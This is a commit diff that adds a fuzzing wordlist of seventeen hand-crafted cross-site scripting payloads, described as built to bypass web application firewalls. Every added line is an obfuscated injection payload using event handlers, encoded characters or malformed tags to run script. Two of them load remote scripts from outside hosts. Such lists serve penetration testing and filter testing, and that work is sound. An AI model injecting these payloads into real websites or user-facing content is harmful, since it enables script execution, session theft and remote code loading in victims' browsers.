Merge pull request #224 from s0md3v/patch-1

Hand crafted XSS payloads to bypass WAFs

Source: https://github.com/s0md3v/AwesomeXSS

Author: g0tmi1k

Fuzzing/XSS-Somdev.txt

@@ -0,0 +1,17 @@
+<svg%0Aonload=%09((pro\u006dpt))()//
+<sCript x>(((confirm)))``</scRipt x>
+<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
+<details open ontoggle=confirm()>
+<script y="><">/*<script* */prompt()</script
+<a href="javascript%26colon;alert(1)">click
+<svg onload=write()>
+<a href=javas&#99;ript:alert(1)>click
+<script/"<a"/src=data:=".<a,[8].some(confirm)>
+<svg/x=">"/onload=confirm()//
+<--`<img/src=` onerror=confirm``> --!>
+<svg </onload ="1> (_=prompt,_(1)) "">
+<!--><script src=//14.rs>
+<script x=">" src=//15.rs></script>
+<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
+<x oncut=alert()>x
+<iframe/src \/\/onload = prompt(1)